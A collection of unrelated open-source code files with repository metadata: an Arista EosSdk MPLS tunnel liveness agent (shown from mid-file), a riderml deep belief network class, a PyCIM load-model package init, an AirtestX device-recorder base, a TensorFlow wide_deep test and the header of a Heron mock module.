# Status
self.last_tx_msg_id = 0
self.last_rx_msg_id = 0
self.pid = 0
# The `remote_tunnel_status` variable keeps track of whether their
# tunnels are alive or not. It is a mapping from an integer
# tunnel_key to a RemoteTunnelStatus() object. Note that these
# keys correspond to the remote switche's tunnel collection, and
# is not the same as the keys for the `tunnels` variable above.
self.remote_tunnel_status = {}
def liveness_dict(self, cur_time):
ret = {}
for key, tunnel_status in self.remote_tunnel_status.items():
time_delta = cur_time - tunnel_status.last_update_time
if time_delta > (TIMEOUT_TIME * 10):
# Stop sending tunnels that we haven't heard from in a
# really long time.
del self.remote_tunnel_status[key]
elif time_delta > TIMEOUT_TIME:
# Tunnel is dead!
ret[key] = False
else:
ret[key] = True
return ret
class MPLS(scapy.packet.Packet):
""" Create an MPLS header that can be used with scapy packets """
name = "MPLS"
fields_desc = [ scapy.fields.BitField("label", 9, 20),
scapy.fields.BitField("cos", 0, 3),
scapy.fields.BitField("s", 1, 1),
scapy.fields.ByteField("ttl", 0) ]
scapy.packet.bind_layers(scapy.layers.l2.Ether, MPLS, type=0x8847)
class InotifyHandler(pyinotify.ProcessEvent):
""" A helper class handles inotify updates """
parent = None
def my_init(self, **kwargs):
self.parent = kwargs['parent']
def process_IN_MODIFY(self, event):
self.parent.process_config()
class MplsTunnelLivenessAgent(eossdk_utils.EosSdkAgent,
eossdk.AgentHandler,
eossdk.FdHandler,
eossdk.TimeoutHandler):
""" This agent is responsible for tracking the liveness of specified
MPLS tunnels. """
def __init__(self, sdk, config_file="MplsTunnelLivenessConfig.json"):
""" Create the agent. Requires an eossdk handle, as well as the
input configuration """
self.agent_mgr = sdk.get_agent_mgr()
self.eth_intf_mgr = sdk.get_eth_intf_mgr()
self.ip_intf_mgr = sdk.get_ip_intf_mgr()
self.mac_table_mgr = sdk.get_mac_table_mgr()
self.neighbor_table_mgr = sdk.get_neighbor_table_mgr()
self.tracer = eossdk.Tracer("MplsTunnelLivenessAgent")
eossdk_utils.EosSdkAgent.__init__(self)
eossdk.AgentHandler.__init__(self, self.agent_mgr)
eossdk.TimeoutHandler.__init__(self, sdk.get_timeout_mgr())
eossdk.FdHandler.__init__(self)
self.tracer.trace0("MPLS tunnel liveness agent constructed")
self.initialized = False
self.pid = os.getpid()
# The l3 interface we should grab our "SRC IP" from. Read from
# the config:
self.src_intf = None
self.src_ip = None # Resolved after reading from config
# A UDP socket that receives liveness packets from other
# agents. Created during on_initialized
self.rx_sock = None
# A mapping from remote switch IP to RemoteSwitch()
self.remote_switches = {}
self.config_file = config_file
self.wm = pyinotify.WatchManager()
handler = functools.partial(InotifyHandler, parent=self)
# pylint: disable-msg=E1101
self.wm.watch_transient_file(config_file, pyinotify.IN_MODIFY, handler)
# pylint: enable-msg=E1101
self.notifier = pyinotify.AsyncNotifier(self.wm,
InotifyHandler(parent=self))
self.notifier.coalesce_events(True)
self.inotify_fd = self.wm.get_fd()
self.watch_readable(self.inotify_fd, True)
# Read our initial configuration
self.process_config()
def on_initialized(self):
""" Update our configured egress tunnels. Start all tunnels as
alive, with a last_update_time of now + any grace
period. Calculate the output interfaces for each tunnel based
off of that tunnel's nexthop MAC address. """
self.initialized = True
self.tracer.trace2("Looking up the IP address for interface " + self.src_intf)
src_ips = self.ip_intf_mgr.ip_addrs(eossdk.IntfId(self.src_intf))
if not src_ips:
assert False, "No IP addresses assigned to %s" % self.src_intf
self.src_ip = src_ips[0].addr().to_string()
self.tracer.trace2("Using src IP address " + self.src_ip)
self.tracer.trace2("Create the socket that receives remote probes")
self.rx_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.rx_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.rx_sock.bind((self.src_ip, UDP_PORT))
self.rx_sock.setblocking(0)
self.watch_readable(self.rx_sock.fileno(), True)
self.resolve_config()
def handle_tunnel_alive(self, dst_ip, tunnel_key, tunnel):
self.tracer.trace3("Tunnel %d to %s came back!" % (tunnel_key, dst_ip))
# Do any other logic (a.k.a. alert another agent that
# tunnel.mpls_label is usable again)
def handle_tunnel_death(self, dst_ip, tunnel_key, tunnel):
self.tracer.trace3("Tunnel %d to %s died!" % (tunnel_key, dst_ip))
# Do any other logic (a.k.a. alert another agent that
# tunnel.mpls_label is no longer a valid tunnel)
def on_timeout(self):
""" Time to send some packets to our neighbors! Our poller
fired, so we should send out our heartbeat packets. We also
check if we haven't heard about any of our tunnels recently, and
if so, mark them as dead. """
cur_time = time.time()
for host in self.remote_switches.itervalues():
liveness_dict = host.liveness_dict(cur_time)
host.last_tx_msg_id += 1
if host.last_tx_msg_id > MAX_INT:
host.last_tx_msg_id = 1
for key, tunnel in host.egress_tunnels.iteritems():
msg = Message(self.pid, key, host.last_tx_msg_id, liveness_dict)
self.send_packet(host.destination_ip, tunnel, msg)
if tunnel.is_alive and (
time.time() - tunnel.last_update_time > TIMEOUT_TIME):
# There has been no updates to this tunnel at all
# within our timeout period.
tunnel.is_alive = False
self.handle_tunnel_death(host.destination_ip, key, tunnel)
# Schedule us to be called again in the future
self.timeout_time_is(eossdk.now() + POLL_TIME)
def on_readable(self, fd):
""" We got a packet on our UDP port! Read the packet, update our
views of the remote tunnel's liveness, and then parse the
packet's payload to inspect what the remote packet thinks of
*our* tunnel liveness. If any liveness changed, then fire our
handlers. """
if fd == self.inotify_fd:
self.tracer.trace6("Inotify fd %d is readable" % self.inotify_fd)
self.notifier.handle_read()
return
if fd != self.rx_sock.fileno():
assert False, "Unknown socket became readable %d" % fd
data, addr = self.rx_sock.recvfrom(MAX_PKT_SIZE)
src_ip = addr[0]
self.tracer.trace6("Received message from %r" % src_ip)
if not data:
self.tracer.trace7("Received empty message, ignoring.")
return
msg = Message.deserialize(data)
if not msg:
self.tracer.trace7("Received invalid message, ignoring! "
"First 500 bytes of pkt: %r" % data[:500])
return
self.tracer.trace8("Got message %s" % str(msg))
if src_ip not in self.remote_switches:
self.tracer.trace7("Got packet from unknown host: %r" % src_ip)
return
remote_switch = self.remote_switches[src_ip]
remote_tunnel_status = remote_switch.remote_tunnel_status.setdefault(
msg.egress_tunnel_key, RemoteTunnelStatus())
if msg.pid != remote_switch.pid:
# This is the either the first message we've received from
# them, or their remote switch restarted. In any case, the
# msg IDs they are sending will have been reset.
remote_switch.pid = msg.pid
remote_switch.last_rx_msg_id = 0
remote_tunnel_status.last_rx_msg_id = 0
# First track we got a packet from the sender's tunnel named
# in the packet.
if self.is_new_id(remote_tunnel_status.last_rx_msg_id, msg.msg_id):
# Do we care about packets coming in out of order?
remote_tunnel_status.last_update_time = time.time()
remote_tunnel_status.last_rx_msg_id = msg.msg_id
# Then inspect the body of the packet that tells me which of
# my tunnel statuses the remote switch has seen.
if not self.is_new_id(remote_switch.last_rx_msg_id, msg.msg_id):
# We've already seen newer messages. Ignore the this.
self.tracer.trace7("Got old message with id: %d (currently at %d)"
% (msg.msg_id, remote_switch.last_rx_msg_id))
return
remote_switch.last_rx_msg_id = msg.msg_id
for tunnel_key, is_alive in msg.tunnel_liveness.iteritems():
if tunnel_key not in remote_switch.egress_tunnels:
# They are telling us about one of our egress tunnels that
# we have no record of...
self.tracer.trace0("Got tunnel status for an unknown key: %r" %
tunnel_key)
continue
tunnel = remote_switch.egress_tunnels[tunnel_key]
tunnel.last_update_time = time.time()
# Check if the remote switch thinks our egress tunnel is
# up or down. If it changed, call our handlers!
if tunnel.is_alive == is_alive:
self.tracer.trace9("No change to liveness for tunnel %d" % tunnel_key)
continue
elif is_alive:
tunnel.is_alive = True
self.handle_tunnel_alive(src_ip, tunnel_key, tunnel)
else:
tunnel.is_alive = False
self.handle_tunnel_death(src_ip, tunnel_key, tunnel)
def resolve_egress_tunnel(self, tunnel):
self.tracer.trace8("Resolve the nexthop IP %s to an ethernet address" %
tunnel.nexthop_ip)
neighbor_key = eossdk.NeighborKey(
eossdk.IpAddr(tunnel.nexthop_ip), eossdk.IntfId())
neighbor_entry = self.neighbor_table_mgr.neighbor_entry_status(neighbor_key)
if neighbor_entry == eossdk.NeighborEntry():
self.tracer.trace8("Checking static ARP entries")
neighbor_entry = self.neighbor_table_mgr.neighbor_entry(neighbor_key)
if neighbor_entry == eossdk.NeighborEntry():
self.tracer.trace0("IP address %r has no ARP entry" %
tunnel.nexthop_ip)
assert False, "Unlearned nexthop IP %s" % tunnel.nexthop_ip
nexthop_eth_addr = neighbor_entry.eth_addr()
self.tracer.trace5("IP %s lives on %s" %
(tunnel.nexthop_ip, nexthop_eth_addr.to_string()))
tunnel.nexthop_eth_addr = nexthop_eth_addr.to_string()
self.tracer.trace8("Now resolving that MAC entry to an interface.")
# TODO: Is this necessary if we send it out of the "fabric"
# interface?
vlan_id = 1
mac_entry = self.mac_table_mgr.mac_entry(vlan_id, nexthop_eth_addr)
if mac_entry.intf() == eossdk.IntfId():
self.tracer.trace0("Mac entry %r not on any interface" %
tunnel.nexthop_eth_addr)
assert False, "Unlearned nexthop MAC %s" % tunnel.nexthop_eth_addr
intf = mac_entry.intf().to_string()
# Convert the interface names to the kernel interface names
intf = intf.replace("Ethernet", "et")
intf = intf.replace("Port-Channel", "po")
self.tracer.trace5("MAC entry %s is learned on inteface %r" %
(tunnel.nexthop_eth_addr, intf))
tunnel.egress_intf = intf
self.tracer.trace8("Looking up that interface's MAC address")
egress_eth_addr = self.eth_intf_mgr.eth_addr(mac_entry.intf())
if egress_eth_addr == eossdk.EthAddr():
assert False, "Interface %s has no MAC address" % intf
self.tracer.trace5("Intf %s has MAC address %s" %
(intf, egress_eth_addr.to_string()))
tunnel.egress_intf_eth_addr = egress_eth_addr.to_string()
def send_packet(self, dst_ip, tunnel, msg):
""" Wrap `msg` in a UDP-over-MPLS packet, using `dst_ip` and the tunnel's
MPLS label, and send the packet out of the tunnel's egress interface."""
self.tracer.trace8("Sending message %s" % str(msg))
payload = msg.serialize()
pkt = scapy.layers.l2.Ether(src=tunnel.egress_intf_eth_addr,
dst=tunnel.nexthop_eth_addr)
pkt = (pkt / MPLS(label=tunnel.mpls_label, ttl=64) /
scapy.layers.inet.IP(src=self.src_ip,
dst=dst_ip) /
scapy.layers.inet.UDP(dport=UDP_PORT) /
(payload))
# In the real world we might make this non-blocking, but for now
# we assume packet always get sent in one go. Also, it might be
# worth maintaining our own socket to the egress interface to
# save us the work of creating/tearing down raw sockets
# constantly.
scapy.sendrecv.sendp(pkt, iface=tunnel.egress_intf, verbose=0)
def process_config(self):
self.tracer.trace1("Processing configuration change on %s" %
self.config_file)
with open(self.config_file) as f:
cfg = json.loads(f.read())
if not self.initialized:
# Write the src_intf only once.
self.src_intf = cfg["src_intf"]
# Clear out the previous config:
self.remote_switches = {}
# And signify that we are a new process by changing our
# advertised pid. It would be preferable to just only update the
# newly configured tunnels, but that's more complicated for now.
self.pid -= 1
for rs in cfg["remote_switches"]:
dst_ip = rs["destination_ip"]
dst = RemoteSwitch(dst_ip)
for tunnel_key_str, tunnel_info in rs["tunnels"].iteritems():
tunnel_key = int(tunnel_key_str)
dst.egress_tunnels[tunnel_key] = EgressTunnel(
tunnel_info["label"], tunnel_info["nexthop_ip"])
self.remote_switches[dst_ip] = dst
if self.initialized:
self.resolve_config()
def resolve_config(self):
self.tracer.trace2("Resolving all of our configured tunnels")
for host in self.remote_switches.itervalues():
for tunnel in host.egress_tunnels.itervalues():
tunnel.last_update_time = time.time() + STARTUP_GRACEPERIOD
self.resolve_egress_tunnel(tunnel)
self.timeout_time_is(eossdk.now() + POLL_TIME)
def is_new_id(self, last_seen_id, new_id):
# Returns True if the new_id is larger than the last_seen_id, or
# the new_id has wrapped around.
return (last_seen_id < new_id) or ((last_seen_id - new_id) > (MAX_INT / 2))
def main(args):
sdk = eossdk.Sdk()
_ = MplsTunnelLivenessAgent(sdk)
sdk.main_loop(args)
if __name__ == "__main__":
main(sys.argv)
|
{
"content_hash": "30d64882d029b58fc6b0c4bac1f90aa0",
"timestamp": "",
"source": "github",
"line_count": 496,
"max_line_length": 85,
"avg_line_length": 41.78225806451613,
"alnum_prop": 0.6367979154603358,
"repo_name": "aristanetworks/EosSdk",
"id": "8c1df1ae7d234b49c44ebd3ae1735f87641989de",
"size": "20866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/MplsTunnelLivenessAgent.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "584"
},
{
"name": "C++",
"bytes": "1409997"
},
{
"name": "Dockerfile",
"bytes": "3130"
},
{
"name": "M4",
"bytes": "3597"
},
{
"name": "Makefile",
"bytes": "5620"
},
{
"name": "Python",
"bytes": "548"
},
{
"name": "SWIG",
"bytes": "38729"
},
{
"name": "Shell",
"bytes": "1769"
}
],
"symlink_target": ""
}
|
from ..base import model
import numpy
from ..util.preprocessing import as_matrix
from autoencoder import autoencoder
import nn
class dbn(model):
def __init__(self, layers, pretrain=True):
"""
Initialization of the deep belief network with given layers.
arguments:
layers - list of Layer objects
pretrain - whether or not to pretrain layers with
autoencoders
"""
self.layers = layers
# initialize hidden layer weights
self.init_weights()
self.pretrain = pretrain
def init_weights(self):
# the input layer doesn't have weights
for layer_index in range(1, len(self.layers)):
layer = self.layers[layer_index]
layer.init_weights(len(self.layers[layer_index - 1].visible))
def propagate_forward(self, row):
if self.layers[0].bias:
self.layers[0].visible[1:] = row
else:
self.layers[0].visible = row
for layer_index in range(1, len(self.layers)):
layer = self.layers[layer_index]
layer.propagate_forward(self.layers[layer_index - 1].visible)
def fit(self, x, y, iterations=1, shuffle=True):
data = as_matrix(x)
response = y
self.layers[0] = nn.layer(len(data[0]), bias=self.layers[0].bias)
# initialize the hidden layers with stacked autoencoders
if self.pretrain:
out = x
for index in range(1, len(self.layers) - 1):
layer = self.layers[index]
trained = autoencoder(len(layer.visible))
trained.fit(out)
out = trained.predict(out)
layer.weights = trained.layers[1].weights
errors = []
for iteration in range(iterations):
if shuffle:
inds = numpy.random.permutation(range(len(data)))
data = data[inds]
response = response[inds]
for row_ind, row in enumerate(data):
# propagate forward
self.propagate_forward(row)
# propagate backward -- the input weights never change
layer = self.layers[-1]
target = response[row_ind]
errors.append(sum(target - layer.visible))
# do hidden layers
for layer_index in range(len(self.layers) - 1, 0, -1):
layer = self.layers[layer_index]
input_layer = self.layers[layer_index - 1]
target = layer.propagate_backward(input_layer, target)
return errors
def predict(self, x):
data = as_matrix(x)
predicted = []
for row in data:
# propagate forward
self.propagate_forward(row)
prediction = self.layers[-1].visible
predicted.append(prediction)
return numpy.array(predicted)
|
{
"content_hash": "a8fa0dee378b53e0884b6575e942fefd",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 74,
"avg_line_length": 32.888888888888886,
"alnum_prop": 0.5574324324324325,
"repo_name": "arider/riderml",
"id": "7e6299e8701eed4d4be609945cace3099264febf",
"size": "2960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "riderml/neural_network/dbn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "95263"
}
],
"symlink_target": ""
}
|
"""This package is responsible for modeling the energy consumers and the system load as curves and associated curve data. Special circumstances that may affect the load, such as seasons and daytypes, are also included here. This information is used by Load Forecasting and Load Management.
"""
from CIM14.CPSM.Equipment.LoadModel.EnergyArea import EnergyArea
from CIM14.CPSM.Equipment.LoadModel.Season import Season
from CIM14.CPSM.Equipment.LoadModel.SubLoadArea import SubLoadArea
from CIM14.CPSM.Equipment.LoadModel.NonConformLoadSchedule import NonConformLoadSchedule
from CIM14.CPSM.Equipment.LoadModel.LoadResponseCharacteristic import LoadResponseCharacteristic
from CIM14.CPSM.Equipment.LoadModel.ConformLoadSchedule import ConformLoadSchedule
from CIM14.CPSM.Equipment.LoadModel.NonConformLoadGroup import NonConformLoadGroup
from CIM14.CPSM.Equipment.LoadModel.ConformLoadGroup import ConformLoadGroup
from CIM14.CPSM.Equipment.LoadModel.ConformLoad import ConformLoad
from CIM14.CPSM.Equipment.LoadModel.NonConformLoad import NonConformLoad
from CIM14.CPSM.Equipment.LoadModel.StationSupply import StationSupply
from CIM14.CPSM.Equipment.LoadModel.SeasonDayTypeSchedule import SeasonDayTypeSchedule
from CIM14.CPSM.Equipment.LoadModel.LoadArea import LoadArea
from CIM14.CPSM.Equipment.LoadModel.DayType import DayType
from CIM14.CPSM.Equipment.LoadModel.LoadGroup import LoadGroup
nsURI = "http://iec.ch/TC57/2009/CIM-schema-cim14?profile=http://iec.ch/TC57/2007/profile#LoadModel"
nsPrefix = "cimLoadModel"
class SeasonName(str):
"""Values are: fall, winter, spring, summer
"""
pass
|
{
"content_hash": "dcfd1b7a31f5c2cd8dbd44a7505a9f89",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 290,
"avg_line_length": 59.74074074074074,
"alnum_prop": 0.8462492250464972,
"repo_name": "rwl/PyCIM",
"id": "3df37941eca0c4a59f94082e7ff5c380a37186c1",
"size": "2713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CIM14/CPSM/Equipment/LoadModel/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7420564"
}
],
"symlink_target": ""
}
|
import bisect
import cv2
import os
import pickle
import Queue
import sys
import threading
import time
import traceback
import json
from collections import namedtuple
class BaseRecorder(object):
monitor_period = 3 # seconds
def __init__(self, device=None, workdir=".", realtime_analyze=False):
self.device = None
self.device_info = {}
self.running = False
self.setup_workdir(workdir)
if device is not None:
self.attach(device)
self.realtime_analyze = realtime_analyze
self.thread = None
self.frames = [] # for backup
self.last_frame_time = None
self.case_draft = [] # for analyze draft
self.input_queue = Queue.Queue()
self.input_index = 0
# find addons from base classes
self.addons = {}
for cls in self.__class__.__bases__:
name = getattr(cls, '_%s__addon_name' % (cls.__name__,), None)
if name is not None:
gfun = getattr(self, 'get_%s' % (name,))
sfun = getattr(self, 'save_%s' % (name,))
lfun = getattr(self, 'load_%s' % (name,))
self.addons[name] = (gfun, sfun, lfun)
def setup_workdir(self, workdir):
# setup direcoties
self.workdir = workdir
self.casedir = os.path.join(workdir, 'case')
if not os.path.exists(self.casedir):
os.makedirs(self.casedir)
self.framedir = os.path.join(workdir, 'frames')
if not os.path.exists(self.framedir):
os.makedirs(self.framedir)
def update_device_info(self):
if self.device is None:
return
# TODO: define general device info
self.device_info = {}
def start(self):
'''start running in background.'''
self.update_device_info()
self.get_device_status(0) # start addons.
self.hook()
self.thread = threading.Thread(target=self._run)
self.thread.start()
self.running = True
def stop(self):
self.unhook()
self.running = False
self.thread.join()
def get_device_status(self, t):
'''get device status at a given time t (within self.monitor_period)'''
data = {}
for name, (func, _, _) in self.addons.iteritems():
data[name] = func(t)
return data
def _run(self):
while True:
try:
time.sleep(0.1)
frame = self.input_queue.get_nowait()
self.handle_frame(frame)
except Queue.Empty:
if not self.running:
break
except:
traceback.print_exc()
self.running = False
# save meta info for backup & draft.
if not self.realtime_analyze:
self.analyze_all()
self.save()
print 'recorder stopped.'
sys.exit()
def input_event(self, event):
'''should be called when user input events happens (from hook)'''
if not self.running or self.device is None:
return
# print 'input_event', event.time
status = self.get_device_status(event.time)
self.input_index += 1
self.input_queue.put((self.input_index, event, status))
def handle_frame(self, frame):
# print 'handle frame'
idx, event, status = frame
meta = {'index':idx}
meta['event'] = self.serialize_event(event)
if self.last_frame_time is None:
meta['waittime'] = 0
else:
meta['waittime'] = event.time - self.last_frame_time
self.last_frame_time = event.time
# save frames.
# print 'saving...'
eventpath = os.path.join(self.framedir, '%d-event.pkl' % idx)
pickle.dump(event, file(eventpath, 'w'))
meta['status'] = {}
for name, obj in status.iteritems():
func = self.addons[name][1]
data = func(obj, self.framedir, idx)
meta['status'][name] = data
# analyze
if self.realtime_analyze:
self.analyze_frame(idx, event, status, meta['waittime'])
self.frames.append(meta)
def serialize_event(self, event):
return {}
def analyze_frame(self, idx, event, status, waittime):
'''analyze status and generate draft code'''
# Example:
#
# d = {
# 'action' : 'click',
# 'args' : (100, 100),
# 'status' : {
# 'screen' : ('xxxx.png', 'xxx.png'),
# 'screen_orientation' : 0,
# 'uixml' : {'package': 'com.netease.txx', 'class_name' : 'android.widget.EditText', ...}
# },
# 'pyscript' : 'd.click(100, 100)',
# }
#
# self.case_draft.append(d)
pass
def analyze_all(self):
print 'total frames:', len(self.frames)
print 'analying, please wait ...'
for meta in self.frames:
idx = meta['index']
event = pickle.load(file(os.path.join(self.framedir, '%d-event.pkl' % idx)))
status = meta['status']
status = {}
for name, data in meta['status'].iteritems():
if data is None:
status[name] = None
continue
func = self.addons[name][2]
status[name] = func(self.framedir, data)
self.analyze_frame(idx, event, status, meta['waittime'])
@classmethod
def analyze_frames(cls, workdir):
'''generate draft from recorded frames'''
record = cls(None, workdir)
obj = {}
with open(os.path.join(workdir, 'frames', 'frames.json')) as f:
obj = json.load(f)
record.device_info = obj['device']
record.frames = obj['frames']
record.analyze_all()
record.save()
def save(self):
# save frames info, do not overwrite.
filepath = os.path.join(self.framedir, 'frames.json')
if not os.path.exists(filepath):
obj = {
'ctime' : time.ctime(),
'device' : self.device_info,
'frames' : self.frames,
}
with open(filepath, 'w') as f:
json.dump(obj, f, indent=2)
# save draft info
filepath = os.path.join(self.casedir, 'draft.json')
obj = {'skips':[], 'actions': self.case_draft}
with open(filepath, 'w') as f:
json.dump(obj, f, indent=2)
# save draft pyscript
filepath = os.path.join(self.casedir, 'script.py')
content = [
'#-*- encoding: utf-8 -*-', '# Generated by recorder.',
'',
'import time',
'',
'def test(d):',
]
for row in self.case_draft:
script = row['pyscript'].encode('utf-8', 'ignore')
for line in script.split('\n'):
content.append(' '*4 + line)
# content.append(' '*4 + 'time.sleep(1)')
content.extend([
'',
'if __name__ == "__main__":',
' import atx',
' d = atx.connect()',
' test(d)',
])
with open(filepath, 'w') as f:
f.write('\n'.join(content))
def attach(self, device):
'''Attach to device, if current device is not None, should
detach from it first. '''
raise NotImplementedError()
def detach(self):
'''Detach from current device.'''
raise NotImplementedError()
def hook(self):
'''Hook user input.'''
raise NotImplementedError()
def unhook(self):
'''Unhook user input.'''
raise NotImplementedError()
__CaptureRecord = namedtuple('__CaptureRecord', ('ctime', 'image'))
class CaptureRecord(__CaptureRecord):
def __eq__(self, other):
return self[0] == other[0]
def __ne__(self, other):
return not self == other
def __gt__(self, other):
return self[0] > other[0]
def __ge__(self, other):
return not self<other
def __lt__(self, other):
return self[0] < other[0]
def __le__(self, other):
return not other<self
class ScreenAddon(object):
__addon_name = 'screen'
__capture_cache = []
__capture_interval = 0.1
__capture_lock = None
__capture_thread = None
def get_screen(self, t):
if self.__capture_thread is None:
self.__start()
with self.__capture_lock:
idx = bisect.bisect(self.__capture_cache, (t, None))
if idx != 0:
return self.__capture_cache[idx-1][1]
def save_screen(self, screen, dirpath, idx):
if screen is None:
return
filename = '%d.png' % idx
filepath = os.path.join(dirpath, filename)
cv2.imwrite(filepath, screen)
return filename
def load_screen(self, dirpath, filename):
filepath = os.path.join(dirpath, filename)
try:
return cv2.imread(filepath)
except:
return
def __start(self):
print 'start', self.__addon_name
if self.__capture_lock is None:
self.__capture_lock = threading.Lock()
if self.__capture_thread is not None:
self.__capture_thread._Thread_stop() # using __stop private method, not good
self.__capture_thread = t = threading.Thread(target=self.__capture)
t.setDaemon(True)
t.start()
def __capture(self):
capture_maxnum = int(self.monitor_period/self.__capture_interval)
while True:
self.__capture_lock.acquire()
try:
time.sleep(self.__capture_interval)
if not self.running or self.device is None:
continue
# tic = time.time()
img = self.device.screenshot_cv2()
# print '--capturing.. cost', time.time() - tic
self.__capture_cache.append(CaptureRecord(time.time(), img))
self.__capture_cache = self.__capture_cache[-capture_maxnum:]
finally:
self.__capture_lock.release()
class UixmlAddon(object):
__addon_name = 'uixml'
__uidump_cache = []
__uidump_interval = 0.1
__uidump_lock = None
__uidump_thread = None
def get_uixml(self, t):
if self.__uidump_thread is None:
self.__start()
with self.__uidump_lock:
idx = bisect.bisect(self.__uidump_cache, (t, ''))
if idx != 0:
return self.__uidump_cache[idx-1][1]
def save_uixml(self, uixml, dirpath, idx):
if uixml is None:
return
filename = '%d-uidump.xml' % idx
filepath = os.path.join(dirpath, filename)
with open(filepath, 'w') as f:
f.write(uixml)
return filename
def load_uixml(self, dirpath, filename):
filepath = os.path.join(dirpath, filename)
try:
return open(filepath).read()
except IOError:
return u''
def __start(self):
print 'start', self.__addon_name
if self.__uidump_lock is None:
self.__uidump_lock = threading.Lock()
if self.__uidump_thread is not None:
self.__uidump_thread._Thread_stop() # using __stop private method, not good
self.__uidump_thread = t = threading.Thread(target=self.__dump)
t.setDaemon(True)
t.start()
def __dump(self):
uidump_maxnum = int(self.monitor_period/self.__uidump_interval)
while True:
self.__uidump_lock.acquire()
try:
time.sleep(self.__uidump_interval)
if not self.running or self.device is None:
continue
# tic = time.time()
xmldata = self.device.dumpui()
xmldata = xmldata.encode('utf-8')
# print 'dumping ui.. cost', time.time() - tic
self.__uidump_cache.append((time.time(), xmldata))
self.__uidump_cache = self.__uidump_cache[-uidump_maxnum:]
finally:
self.__uidump_lock.release()
if __name__ == '__main__':
class TestRecorder(BaseRecorder, ScreenAddon, UixmlAddon):
def attach(self, device):
self.device = device
def detach(self): pass
def hook(self): pass
def unhook(self): pass
class DummyDevice(object):
def screenshot_cv2(self):
return None
def dumpui(self):
return u'uixml'
class DummyEvent(object):
def __init__(self):
self.time = time.time()
r = TestRecorder(DummyDevice(), 'testcase')
r.start()
count = 10
while count > 0:
try:
time.sleep(1)
e = DummyEvent()
r.input_event(e)
except:
break
count -= 1
r.stop()
|
{
"content_hash": "7d36e9018d350fbe1440db17f205cf00",
"timestamp": "",
"source": "github",
"line_count": 414,
"max_line_length": 106,
"avg_line_length": 32.44202898550725,
"alnum_prop": 0.5090462363189636,
"repo_name": "Andy-hpliu/AirtestX",
"id": "ac51fb33e2f7418596dc84c22004aa6b449a8210",
"size": "13457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atx/record/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "230"
},
{
"name": "CSS",
"bytes": "34684"
},
{
"name": "Go",
"bytes": "13043"
},
{
"name": "HTML",
"bytes": "28019"
},
{
"name": "JavaScript",
"bytes": "300119"
},
{
"name": "Makefile",
"bytes": "348"
},
{
"name": "Protocol Buffer",
"bytes": "5495"
},
{
"name": "Python",
"bytes": "394333"
},
{
"name": "Shell",
"bytes": "4162"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
import wide_deep
tf.logging.set_verbosity(tf.logging.ERROR)
TEST_INPUT = ('18,Self-emp-not-inc,987,Bachelors,12,Married-civ-spouse,abc,'
'Husband,zyx,wvu,34,56,78,tsr,<=50K')
TEST_INPUT_VALUES = {
'age': 18,
'education_num': 12,
'capital_gain': 34,
'capital_loss': 56,
'hours_per_week': 78,
'education': 'Bachelors',
'marital_status': 'Married-civ-spouse',
'relationship': 'Husband',
'workclass': 'Self-emp-not-inc',
'occupation': 'abc',
}
TEST_CSV = os.path.join(os.path.dirname(__file__), 'wide_deep_test.csv')
class BaseTest(tf.test.TestCase):
def setUp(self):
# Create temporary CSV file
self.temp_dir = self.get_temp_dir()
self.input_csv = os.path.join(self.temp_dir, 'test.csv')
with tf.gfile.Open(self.input_csv, 'w') as temp_csv:
temp_csv.write(TEST_INPUT)
def test_input_fn(self):
features, labels = wide_deep.input_fn(self.input_csv, 1, False, 1)()
with tf.Session() as sess:
features, labels = sess.run((features, labels))
# Compare the two features dictionaries.
for key in TEST_INPUT_VALUES:
self.assertTrue(key in features)
self.assertEqual(len(features[key]), 1)
feature_value = features[key][0]
# Convert from bytes to string for Python 3.
if isinstance(feature_value, bytes):
feature_value = feature_value.decode()
self.assertEqual(TEST_INPUT_VALUES[key], feature_value)
self.assertFalse(labels)
def build_and_test_estimator(self, model_type):
"""Ensure that model trains and minimizes loss."""
model = wide_deep.build_estimator(self.temp_dir, model_type)
# Train for 1 step to initialize model and evaluate initial loss
model.train(
input_fn=wide_deep.input_fn(
TEST_CSV, num_epochs=1, shuffle=True, batch_size=1),
steps=1)
initial_results = model.evaluate(
input_fn=wide_deep.input_fn(
TEST_CSV, num_epochs=1, shuffle=False, batch_size=1))
# Train for 40 steps at batch size 2 and evaluate final loss
model.train(
input_fn=wide_deep.input_fn(
TEST_CSV, num_epochs=None, shuffle=True, batch_size=2),
steps=40)
final_results = model.evaluate(
input_fn=wide_deep.input_fn(
TEST_CSV, num_epochs=1, shuffle=False, batch_size=1))
print('%s initial results:' % model_type, initial_results)
print('%s final results:' % model_type, final_results)
self.assertLess(final_results['loss'], initial_results['loss'])
def test_wide_deep_estimator_training(self):
self.build_and_test_estimator('wide_deep')
if __name__ == '__main__':
tf.test.main()
|
{
"content_hash": "8481348292d1875797aa524c7cd5e109",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 76,
"avg_line_length": 31.054945054945055,
"alnum_prop": 0.6493276716206653,
"repo_name": "zlpmichelle/crackingtensorflow",
"id": "55fa00fa6cc00dee724ce376b78440163a19e205",
"size": "3516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wide_deep/wide_deep_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1109569"
},
{
"name": "Python",
"bytes": "583902"
},
{
"name": "Shell",
"bytes": "111"
}
],
"symlink_target": ""
}
|
"""mock_generator.py: module for creating mock objects for unittesting
mainly for common/tests/python/utils"""
# pylint: disable=unused-argument
# pylint: disable=missing-docstring
import random
from mock import patch
from heronpy.api.task_hook import ITaskHook
from heronpy.api.custom_grouping import ICustomGrouping
